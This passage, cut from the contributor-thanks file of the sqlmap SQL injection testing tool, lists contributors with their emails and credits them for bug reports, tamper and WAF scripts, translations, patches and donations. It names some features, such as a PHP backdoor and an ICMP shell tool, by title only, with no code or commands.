Hysia Chow <hysia(at)icloud.com>
|
||||||
|
* for contributing a couple of WAF scripts
|
||||||
|
|
||||||
|
Chris Clements, <cclements(at)flatearth.net>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
John Cobb, <johnc(at)nobytes.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Andreas Constantinides, <megahz(at)megahz.org>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Andre Costa, <andre.investorsclub(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
* for suggesting a minor enhancement
|
||||||
|
|
||||||
|
Ulises U. Cune, <ulises2k(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Alessandro Curio, <alessandro.curio(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Sherif El-Deeb, <archeldeeb(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Stefano Di Paola, <stefano.dipaola(at)wisec.it>
|
||||||
|
* for suggesting good features
|
||||||
|
|
||||||
|
Mosk Dmitri, <ya(at)darkbyte.ru>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Meng Dong, <whenov(at)gmail.com>
|
||||||
|
* for contributing a code for Waffit integration
|
||||||
|
|
||||||
|
Carey Evans, <careye(at)spamcop.net>
|
||||||
|
* for his fcrypt module that allows crypt(3) support
|
||||||
|
on Windows platforms
|
||||||
|
|
||||||
|
Shawn Evans, <shawndevans(at)gmail.com>
|
||||||
|
* for suggesting an idea for one tamper script, greatest.py
|
||||||
|
|
||||||
|
Adam Faheem, <faheem.adam(at)is.co.za>
|
||||||
|
* for reporting a few bugs
|
||||||
|
|
||||||
|
James Fisher, <www(at)sittinglittleduck.com>
|
||||||
|
* for contributing two very good feature requests
|
||||||
|
* for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster
|
||||||
|
|
||||||
|
Jim Forster, <jimforster(at)goldenwest.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Rong-En Fan, <rafan(at)freebsd.org>
|
||||||
|
* for commiting the sqlmap 0.5 port to the official FreeBSD project repository
|
||||||
|
|
||||||
|
Giorgio Fedon, <giorgio.fedon(at)gmail.com>
|
||||||
|
* for suggesting a speed improvement for bisection algorithm
|
||||||
|
* for reporting a bug when running against Microsoft SQL Server 2005
|
||||||
|
|
||||||
|
Kasper Fons, <thefeds(at)mail.dk>
|
||||||
|
* for reporting several bugs
|
||||||
|
|
||||||
|
Jose Fonseca, <jose.r.fonseca(at)gmail.com>
|
||||||
|
* for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only
|
||||||
|
http://code.google.com/p/jrfonseca/wiki/Gprof2Dot
|
||||||
|
http://code.google.com/p/jrfonseca/wiki/XDot
|
||||||
|
|
||||||
|
Alan Franzoni, <alan.franzoni(at)gmail.com>
|
||||||
|
* for helping out with Python subprocess library
|
||||||
|
|
||||||
|
Harold Fry, <harold(at)violaceo.us>
|
||||||
|
* for suggesting a minor enhancement
|
||||||
|
|
||||||
|
Daniel G. Gamonal, <lgrecol(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Marcos Mateos Garcia, <mmateos(at)germinus.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Andrew Gecse, <andrew.gecse(at)upcmail.hu>
|
||||||
|
* for reporting a minor issue
|
||||||
|
|
||||||
|
Ivan Giacomelli, <truemilk(at)insiberia.net>
|
||||||
|
* for reporting a bug
|
||||||
|
* for suggesting a minor enhancement
|
||||||
|
* for reviewing the documentation
|
||||||
|
|
||||||
|
Dimitris Giannitsaros, <daremon(at)gmail.com>
|
||||||
|
* for contributing a REST-JSON API client
|
||||||
|
|
||||||
|
Nico Golde, <nico(at)ngolde.de>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Oliver Gruskovnjak, <oliver.gruskovnjak(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
* for contributing a minor patch
|
||||||
|
|
||||||
|
Davide Guerri, <d.guerri(at)caspur.it>
|
||||||
|
* for suggesting an enhancement
|
||||||
|
|
||||||
|
Dan Guido, <dguido(at)gmail.com>
|
||||||
|
* for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/
|
||||||
|
|
||||||
|
David Guimaraes, <skysbsb(at)gmail.com>
|
||||||
|
* for reporting considerable amount of bugs
|
||||||
|
* for suggesting several features
|
||||||
|
|
||||||
|
Chris Hall, <chris.hall(at)mod10.net>
|
||||||
|
* for coding the prettyprint.py library
|
||||||
|
|
||||||
|
Tate Hansen, <tate(at)clearnetsec.com>
|
||||||
|
* for donating to sqlmap development
|
||||||
|
|
||||||
|
Mario Heiderich, <mario.heiderich(at)gmail.com>
|
||||||
|
Christian Matthies, <ch0012(at)gmail.com>
|
||||||
|
Lars H. Strojny, <lars(at)strojny.net>
|
||||||
|
* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org
|
||||||
|
|
||||||
|
Kristian Erik Hermansen, <kristian.hermansen(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
* for donating to sqlmap development
|
||||||
|
|
||||||
|
Alexander Hagenah, <ah(at)primepage.de>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Dennis Hecken, <mail(at)8dh.de>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Choi Ho, <counterhacker815(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Jorge Hoya, <aquinadie(at)gmail.com>
|
||||||
|
* for suggesting a minor enhancement
|
||||||
|
|
||||||
|
Will Holcomb, <wholcomb(at)gmail.com>
|
||||||
|
* for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code
|
||||||
|
|
||||||
|
Daniel Huckmann, <sanitybit(at)gmail.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Daliev Ilya, <daliser(at)yandex.ru>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Mehmet İnce, <mehmet(at)mehmetince.net>
|
||||||
|
* for contributing a tamper script xforwardedfor.py
|
||||||
|
|
||||||
|
Jovon Itwaru, <jovon.itwaru(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Prashant Jadhav, <prashantjadhav.82(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Dirk Jagdmann, <doj(at)cubic.org>
|
||||||
|
* for reporting a typo in the documentation
|
||||||
|
|
||||||
|
Luke Jahnke, <luke.jahnke(at)gmail.com>
|
||||||
|
* for reporting a bug when running against MySQL < 5.0
|
||||||
|
|
||||||
|
Andrew Kitis <andrew.kitis(at)gmail.com>
|
||||||
|
* for contributing a tamper script lowercase.py
|
||||||
|
|
||||||
|
David Klein, <david.klein(at)ipfocus.com.au>
|
||||||
|
* for reporting a minor code improvement
|
||||||
|
|
||||||
|
Sven Klemm, <sven(at)c3d2.de>
|
||||||
|
* for reporting two minor bugs with PostgreSQL
|
||||||
|
|
||||||
|
Anant Kochhar, <anant.kochhar(at)secureyes.net>
|
||||||
|
* for providing with feedback on the user's manual
|
||||||
|
|
||||||
|
Dmitriy Kononov, <dmitriyknnv(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Alexander Kornbrust, <ak(at)red-database-security.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Krzysztof Kotowicz, <kkotowicz(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Nicolas Krassas, <krasn(at)deventum.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Oliver Kuckertz, <oliver.kuckertz(at)mologie.de>
|
||||||
|
* for contributing a minor patch
|
||||||
|
|
||||||
|
Alex Landa, <landa.alex86(at)gmail.com>
|
||||||
|
* for contributing a patch adding beta support for XML output
|
||||||
|
|
||||||
|
Guido Landi, <lists(at)keamera.org>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
* for the great technical discussions
|
||||||
|
* for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development
|
||||||
|
* for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009
|
||||||
|
|
||||||
|
Lee Lawson, <Lee.Lawson(at)dns.co.uk>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
John J. Lee, <jjl(at)pobox.com> and others
|
||||||
|
* for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified
|
||||||
|
|
||||||
|
Nico Leidecker, <nico(at)leidecker.info>
|
||||||
|
* for providing with feedback on a few features
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
* for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip
|
||||||
|
|
||||||
|
Gabriel Lima, <pato(at)bugnet.com.br>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Svyatoslav Lisin, <sel(at)3d-tech.ru>
|
||||||
|
* for suggesting a minor feature
|
||||||
|
|
||||||
|
Miguel Lopes, <theoverblue(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Truong Duc Luong, <luongductruong(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Pavol Luptak, <pavol.luptak(at)nethemba.com>
|
||||||
|
* for reporting a bug when injecting on a POST data parameter
|
||||||
|
|
||||||
|
Till Maas, <opensource(at)till.name>
|
||||||
|
* for suggesting a minor feature
|
||||||
|
|
||||||
|
Michael Majchrowicz, <mmajchrowicz(at)gmail.com>
|
||||||
|
* for extensively beta-testing sqlmap on various MySQL DBMS
|
||||||
|
* for providing really appreciated feedback
|
||||||
|
* for suggesting a lot of ideas and features
|
||||||
|
|
||||||
|
Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
|
||||||
|
* for contributing a Portuguese translation of README.md
|
||||||
|
|
||||||
|
Ahmad Maulana, <matdhule(at)gmail.com>
|
||||||
|
* for contributing a tamper script halfversionedmorekeywords.py
|
||||||
|
|
||||||
|
Ferruh Mavituna, <ferruh(at)mavituna.com>
|
||||||
|
* for exchanging ideas on the implementation of a couple of features
|
||||||
|
|
||||||
|
David McNab, <david(at)conscious.co.nz>
|
||||||
|
* for his XMLObject module that allows XML files to be operated on like Python objects
|
||||||
|
|
||||||
|
Spencer J. McIntyre, <smcintyre(at)securestate.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
* for contributing a patch for OS fingerprinting on DB2
|
||||||
|
|
||||||
|
Brad Merrell, <bradmer12(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Michael Meyer, <m.meyer2k(at)gmail.com>
|
||||||
|
* for suggesting a minor feature
|
||||||
|
|
||||||
|
Enrico Milanese, <enricomilanese(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
* for sharing some ideas for the PHP backdoor
|
||||||
|
|
||||||
|
Liran Mimoni, <reactor.leet(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Marco Mirandola, <mmmccc0(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Devon Mitchell, <devon.mitchell1988(at)yahoo.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Anton Mogilin, <azarmaster81(at)yahoo.com>
|
||||||
|
* for reporting a few bugs
|
||||||
|
|
||||||
|
Sergio Molina, <smolina(at)wpr.es>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Anastasios Monachos, <anastasiosm(at)gmail.com>
|
||||||
|
* for providing some useful data
|
||||||
|
* for suggesting a feature
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Kirill Morozov, <l0rda(at)l0rda.biz>
|
||||||
|
* for reporting a bug
|
||||||
|
* for suggesting a feature
|
||||||
|
|
||||||
|
Alejo Murillo Moya, <alex(at)65535.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
* for suggesting a few features
|
||||||
|
|
||||||
|
Yonny Mutai, <yonnym(at)googlemail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Roberto Nemirovsky, <roberto.paes(at)gmail.com>
|
||||||
|
* for pointing out some enhancements
|
||||||
|
|
||||||
|
Sebastian Nerz, <sebastian.nerz(at)syss.de>
|
||||||
|
* for reporting a (potential) vulnerability in --eval
|
||||||
|
|
||||||
|
Simone Onofri, <simone.onofri(at)gmail.com>
|
||||||
|
* for patching the PHP web backdoor to make it work properly also on Windows
|
||||||
|
|
||||||
|
Michele Orru, <michele.orru(at)antisnatchor.com>
|
||||||
|
* for reporting a couple of bug
|
||||||
|
* for suggesting ideas on how to implement the RESTful API
|
||||||
|
|
||||||
|
Shaohua Pan, <pan(at)knownsec.com>
|
||||||
|
* for reporting several bugs
|
||||||
|
* for suggesting a few features
|
||||||
|
|
||||||
|
Antonio Parata, <s4tan(at)ictsc.it>
|
||||||
|
* for sharing some ideas for the PHP backdoor
|
||||||
|
|
||||||
|
Adrian Pastor, <ap(at)gnucitizen.org>
|
||||||
|
* for donating to sqlmap development
|
||||||
|
|
||||||
|
Christopher Patten, <cpatten(at)sunera.com>
|
||||||
|
* for reporting a bug in the blind SQL injection bisection algorithm
|
||||||
|
|
||||||
|
Zack Payton, <zack.payton(at)executiveinstruments.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Jaime Penalba, <nighterman(at)painsec.com>
|
||||||
|
* for contributing a patch for INSERT/UPDATE generic boundaries
|
||||||
|
|
||||||
|
Pedrito Perez, <0ark1ang3l(at)gmail.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Brandon Perry, <bperry.volatile(at)gmail.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Travis Phillips, <perfect_insanity2004(at)yahoo.com>
|
||||||
|
* for suggesting a minor enhancement
|
||||||
|
|
||||||
|
Mark Pilgrim, <mark(at)diveintomark.org>
|
||||||
|
* for porting chardet package (Universal Encoding Detector) to Python
|
||||||
|
|
||||||
|
Steve Pinkham, <steve.pinkham(at)gmail.com>
|
||||||
|
* for suggesting a feature
|
||||||
|
* for contributing a new SQL injection vector (MSSQL time-based blind)
|
||||||
|
* for donating to sqlmap development
|
||||||
|
|
||||||
|
Adam Pridgen, <adam.pridgen(at)gmail.com>
|
||||||
|
* for suggesting some features
|
||||||
|
|
||||||
|
Luka Pusic, <luka(at)pusic.si>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Ole Rasmussen, <olerass(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
* for suggesting a feature
|
||||||
|
|
||||||
|
Alberto Revelli, <r00t(at)northernfortress.net>
|
||||||
|
* for inspiring to write sqlmap user's manual in SGML
|
||||||
|
* for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net
|
||||||
|
|
||||||
|
David Rhoades, <david.rhoades(at)mavensecurity.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Andres Riancho, <andres.riancho(at)gmail.com>
|
||||||
|
* for beta-testing sqlmap
|
||||||
|
* for reporting a bug and suggesting some features
|
||||||
|
* for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net
|
||||||
|
* for suggesting a way for handling DNS caching
|
||||||
|
|
||||||
|
Jamie Riden, <jamie.riden(at)ngssecure.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Alexander Rigbo, <alex(at)rigbo.se>
|
||||||
|
* for contributing a minor patch
|
||||||
|
|
||||||
|
Antonio Riva, <antonio.riva(at)gmail.com>
|
||||||
|
* for reporting a bug when running with python 2.5
|
||||||
|
|
||||||
|
Ethan Robish, <ethan.robish(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Levente Rog, <levidos(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Andrea Rossi, <andyroyalbattle(at)yahoo.it>
|
||||||
|
* for reporting a minor bug
|
||||||
|
* for suggesting a feature
|
||||||
|
|
||||||
|
Frederic Roy, <frederic.roy(at)telindus.fr>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Vladimir Rutsky, <rutsky.vladimir(at)gmail.com>
|
||||||
|
* for suggesting a couple of minor enhancements
|
||||||
|
|
||||||
|
Richard Safran, <allapplyhere(at)yahoo.com>
|
||||||
|
* for donating the sqlmap.org domain
|
||||||
|
|
||||||
|
Tomoyuki Sakurai, <cherry(at)trombik.org>
|
||||||
|
* for submitting to the FreeBSD project the sqlmap 0.5 port
|
||||||
|
|
||||||
|
Roberto Salgado, <lightos(at)gmail.com>
|
||||||
|
* for contributing considerable amount of tamper scripts
|
||||||
|
|
||||||
|
Pedro Jacques Santos Santiago, <pedro__jacques(at)hotmail.com>
|
||||||
|
* for reporting considerable amount of bugs
|
||||||
|
|
||||||
|
Marek Sarvas, <marek.sarvas(at)gmail.com>
|
||||||
|
* for reporting several bugs
|
||||||
|
|
||||||
|
Philippe A. R. Schaeffer, <schaeff(at)compuphil.de>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Mohd Zamiri Sanin, <zamiri.sanin(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Jorge Santos, <jorge_a_santos(at)hotmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Sven Schluter, <sschlueter(at)netzwerk.cc>
|
||||||
|
* for contributing a patch
|
||||||
|
* for waiting a number of seconds between each HTTP request
|
||||||
|
|
||||||
|
Ryan Sears, <rdsears(at)mtu.edu>
|
||||||
|
* for suggesting a couple of enhancements
|
||||||
|
* for donating to sqlmap development
|
||||||
|
|
||||||
|
Uemit Seren, <uemit.seren(at)gmail.com>
|
||||||
|
* for reporting a minor adjustment when running with python 2.6
|
||||||
|
|
||||||
|
Shane Sewell, <ssewell(at)gmail.com>
|
||||||
|
* for suggesting a feature
|
||||||
|
|
||||||
|
Ahmed Shawky, <ahmed(at)isecur1ty.org>
|
||||||
|
* for reporting a major bug with improper handling of parameter values
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Brian Shura, <bshura(at)appsecconsulting.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Sumit Siddharth, <sid(at)notsosecure.com>
|
||||||
|
* for sharing ideas on the implementation of a couple of features
|
||||||
|
|
||||||
|
Andre Silva, <andreoaz(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Benjamin Silva H. <silva96(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Duarte Silva <duarte.silva(at)serializing.me>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
M Simkin, <mlsimkin(at)cox.net>
|
||||||
|
* for suggesting a feature
|
||||||
|
|
||||||
|
Konrads Smelkovs, <konrads(at)smelkovs.com>
|
||||||
|
* for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server
|
||||||
|
|
||||||
|
Chris Spencer, <chris.spencer(at)ngssecure.com>
|
||||||
|
* for reviewing the user's manual grammar
|
||||||
|
|
||||||
|
Michael D. Stenner, <mstenner(at)linux.duke.edu>
|
||||||
|
* for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections
|
||||||
|
|
||||||
|
Marek Stiefenhofer, <m.stiefenhofer(at)r-tec.net>
|
||||||
|
* for reporting a few bugs
|
||||||
|
|
||||||
|
Jason Swan, <jasoneswan(at)gmail.com>
|
||||||
|
* for reporting a bug when enumerating columns on Microsoft SQL Server
|
||||||
|
* for suggesting a couple of improvements
|
||||||
|
|
||||||
|
Chilik Tamir, <phenoman(at)gmail.com>
|
||||||
|
* for contributing a patch for initial support SOAP requests
|
||||||
|
|
||||||
|
Alessandro Tanasi, <alessandro(at)tanasi.it>
|
||||||
|
* for extensively beta-testing sqlmap
|
||||||
|
* for suggesting many features and reporting some bugs
|
||||||
|
* for reviewing the documentation
|
||||||
|
|
||||||
|
Andres Tarasco, <atarasco(at)gmail.com>
|
||||||
|
* for contributing good feedback
|
||||||
|
|
||||||
|
Tom Thumb, <k1971(at)live.co.uk>
|
||||||
|
* for reporting a major bug
|
||||||
|
|
||||||
|
Kazim Bugra Tombul, <mhackmail(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Efrain Torres, <et(at)metasploit.com>
|
||||||
|
* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository
|
||||||
|
* for his great Metasploit WMAP Framework
|
||||||
|
|
||||||
|
Sandro Tosi, <matrixhasu(at)gmail.com>
|
||||||
|
* for helping to create sqlmap Debian package correctly
|
||||||
|
|
||||||
|
Jacco van Tuijl, <jaccovantuijl(at)gmail.com>
|
||||||
|
* for reporting several bugs
|
||||||
|
|
||||||
|
Vitaly Turenko, <dsu(at)dsu.com.ua>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Augusto Urbieta, <x2xpy50(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Bedirhan Urgun, <bedirhanurgun(at)gmail.com>
|
||||||
|
* for reporting a few bugs
|
||||||
|
* for suggesting some features and improvements
|
||||||
|
* for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
|
||||||
|
|
||||||
|
Kyprianos Vasilopoulos, <kyprianos.vasilopoulos(at)gmail.com>
|
||||||
|
* for reporting a couple of minor bugs
|
||||||
|
|
||||||
|
Vlado Velichkovski, <ketejadam(at)hotmail.com>
|
||||||
|
* for reporting considerable amount of bugs
|
||||||
|
* for suggesting an enhancement
|
||||||
|
|
||||||
|
Johnny Venter, <johnny.venter(at)zoho.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Carlos Gabriel Vergara, <carlosgabrielvergara(at)gmail.com>
|
||||||
|
* for suggesting couple of good features
|
||||||
|
|
||||||
|
Patrick Webster, <patrick(at)aushack.com>
|
||||||
|
* for suggesting an enhancement
|
||||||
|
|
||||||
|
Ed Williams, <ed.williams(at)ngssecure.com>
|
||||||
|
* for suggesting a minor enhancement
|
||||||
|
|
||||||
|
Anthony Zboralski, <anthony.zboralski(at)bellua.com>
|
||||||
|
* for providing with detailed feedback
|
||||||
|
* for reporting a few minor bugs
|
||||||
|
* for donating to sqlmap development
|
||||||
|
|
||||||
|
Thierry Zoller, <thierry(at)zoller.lu>
|
||||||
|
* for reporting a couple of major bugs
|
||||||
|
|
||||||
|
Zhen Zhou, <zhouzhenster(at)gmail.com>
|
||||||
|
* for suggesting a feature
|
||||||
|
|
||||||
|
-insane-, <insane_(at)gmx.de>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
1ndr4 joe, <c0d3w4st3r(at)gmail.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
abc abc, <biedimc(at)gmx.net>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Abuse 007, <abuse007(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
agix, <florian.gaultier@gmail.com>
|
||||||
|
* for contributing the file upload via certutil.exe functionality
|
||||||
|
|
||||||
|
Alex, <m3zero(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
anonymous anonymous, <tmp(at)2ch.so>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
bamboo, <roberthacksley(at)gmail.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Brandon E., <brandonpoc(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
black zero, <timeisflowing(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
blueBoy, <blueboy4444(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
buawig, <buawig(at)gmail.com>
|
||||||
|
* for reporting considerable amount of bugs
|
||||||
|
|
||||||
|
Bugtrace, <bugtrace(at)gmail.com>
|
||||||
|
* for reporting several bugs
|
||||||
|
|
||||||
|
cats, <dump(at)alcor.se>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Christian S, <christian_s(at)linuxmail.org>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
clav, <elclav(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
dragoun dash, <dragoun.dash(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
flsf, <jianmaflsf@gmail.com>
|
||||||
|
* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py
|
||||||
|
* for contributing a minor patch
|
||||||
|
|
||||||
|
fufuh, <fufuh(at)users.sourceforge.net>
|
||||||
|
* for reporting a bug when running on Windows
|
||||||
|
|
||||||
|
Hans Wurst, <wurstwass0r(at)googlemail.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Hysia, <hysia(at)huorui.net>
|
||||||
|
* for contributing a Chinese translation of README.md
|
||||||
|
|
||||||
|
james, <james(at)ev6.net>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Joe "Pragmatk", <pragmatk(at)gmail.com>
|
||||||
|
* for reporting a few bugs
|
||||||
|
|
||||||
|
John Smith, <tixos(at)live.com>
|
||||||
|
* for reporting several bugs
|
||||||
|
* for suggesting some features
|
||||||
|
|
||||||
|
m4l1c3, <malice.anon(at)gmail.com>
|
||||||
|
* for reporting considerable amount of bugs
|
||||||
|
|
||||||
|
mariano, <marianoso(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
mitchell, <mitchell(at)tufala.net>
|
||||||
|
* for reporting a few bugs
|
||||||
|
|
||||||
|
Nadzree, <nadzree(at)bake180.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
nightman, <nightman(at)email.de>
|
||||||
|
* for reporting considerable amount of bugs
|
||||||
|
|
||||||
|
Oso Dog osodog123(at)yahoo.com
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
pacman730, <pacman730(at)users.sourceforge.net>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
pentestmonkey, <pentestmonkey(at)pentestmonkey.net>
|
||||||
|
* for reporting several bugs
|
||||||
|
* for suggesting a few minor enhancements
|
||||||
|
|
||||||
|
Phat R., <phatthanaphol(at)gmail.com>
|
||||||
|
* for reporting a few bugs
|
||||||
|
|
||||||
|
Phil P, <(at)superevr>
|
||||||
|
* for suggesting a minor enhancement
|
||||||
|
|
||||||
|
ragos, <ragos(at)joker.ms>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
rmillet, <rmillet42(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Rub3nCT, <rub3nct(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
shiftzwei, <shiftzwei(at)gmail.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
smith, <esmyl911(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Soma Cruz, <oleg.kupreev(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Spiros94, <cont(at)eyrhka.gr>
|
||||||
|
* for contributing a Greek translation of README.md
|
||||||
|
|
||||||
|
Stuffe, <stuffe.dk(at)gmail.com>
|
||||||
|
* for reporting a minor bug and a feature request
|
||||||
|
|
||||||
|
Sylphid, <sylphid.su(at)sti.com.tw>
|
||||||
|
* for suggesting some features
|
||||||
|
|
||||||
|
syssecurity.info, <syssecurity7(at)googlemail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
This LittlePiggy, <thislittlepiggyhadroastbeef(at)hotmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
ToR, <sstidus(at)email.it>
|
||||||
|
* for reporting considerable amount of bugs
|
||||||
|
* for suggesting a feature
|
||||||
|
|
||||||
|
ultramegaman, <seclists(at)ultramegaman.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Vinicius, <viniciusmaxdaloop(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
wanglei, <wanglei(at)17uxi.cn>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
warninggp, <warninggp(at)gmail.com>
|
||||||
|
* for reporting a few minor bugs
|
||||||
|
|
||||||
|
x, <deep_freeze(at)mail.ru>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
zhouhx, <zhouhx(at)knownsec.com>
|
||||||
|
* for contributing a minor patch
|
||||||
|
|
||||||
|
# Organizations
|
||||||
|
|
||||||
|
